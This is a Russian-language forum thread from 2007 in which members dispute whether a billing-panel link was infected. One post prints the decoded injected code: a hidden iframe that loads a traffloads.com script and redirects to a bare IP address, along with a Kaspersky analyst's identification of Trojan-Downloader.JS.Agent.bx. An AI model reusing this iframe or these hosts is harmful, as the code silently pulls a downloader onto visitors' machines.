![]() |
_Гаврила_ че ты [Вырезано Цензурой] Обьясни наконец!
Гмм....Гаврила....ГаврЫлкО обьясни мине че ты пристал с той темой про билинг панель?Там ничего нету.....ну че ты там умудрился найти!Можешь для меня туподоходящей в качестве исключения обьяснить??
Чессно говоря...а то уже запарило это :confused: :mad: *****(22:33:43 28/01/2007) Тему удалили как я понял и я его не увидел. И передай урсуле, что она возможно уже чей-то бот Ну и ты тоже, если ходил по той ссылке и ничего подозрительного не заметил. *****(22:34:17 28/01/2007) Это гаврила написал И обьясни от куда ты нарыл _______________________________ ****** (23:07:35 28/01/2007) На самом деле в раскодированном виде выглядит это так <IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME> Потом перекидывает сюда http://81.95.146.241/ss21mk2/index.php Ах да Вот письмо от дяди Жени Здравствуйте. 1) На сайте обнаружен зловред (Trojan-Downloader.JS.Agent.bx) 2) На сайте были также недетектируемые нами зловреды - могут возникнуть проблемы. Благодарим за оказанную помощь. --------- С уважением, Юрий Несмачный Вирусный аналитик ЗАО "Лаборатория Касперского" _____________________ Вопрос: позволь узнать как ты раскодировал? |
Вот это и называеца параноя.
|
Мне отсюда инетересно чем он сделал декод....
|
Sandjuro
незнаю....незнаю.. Просто пусть мне предоставит факты! |
Цитата:
просто день идет, а я все жив. |
а через пм или асю никак нельзя у него это узнать ? тему я удалю
|
Ксан.не трогай тему.Нужен глаС народа
|
Итак обратившись в Лаб Касперского,вот что выдало:
Trojan-Downloader.JS.Agent.bx Детектирование добавлено 11 дек 2006 01:09 MSK Обновление выпущено 11 дек 2006 03:08 MSK Поведение Trojan-Downloader, троянский загрузчик У данной программы пока нет описания. Поскольку многие программы являются незначительными модификациями своих предыдущих версий, вам могут помочь описания других версий той же программы — если они есть, то ссылки на них приведены сразу под заголовком страницы. Чтож....теперь вопрос....от куда ты взял его?И ту переходную ссылку? RemaerD Спасибо... |
Цитата:
И как попала моя переписка с Ремаёрдом тебе??? Скорее этот вопрос нужно задать Ремаёрду.. Я не собираюсь обьяснять чем делать декод, это знает каждый школьник. Цитата:
Ремаёрд знает что я ему написал в пм для того чтобы он отредактировал свой пост, либо обьяснился. Урсула сбавь обороты. Подслушивать (подглядывать) чужие разговоры неприлично. p.s. Не надо писать мне в пм. Я не даю уроков кодирования ссылок =) |
ГАвря,не вижу ничего такого что нельзя выкладывать из нашего с тобой ПМ... Вобщем я остаюсь на своем мнении...
УРС ЧмогЕ |
| Время: 05:27 |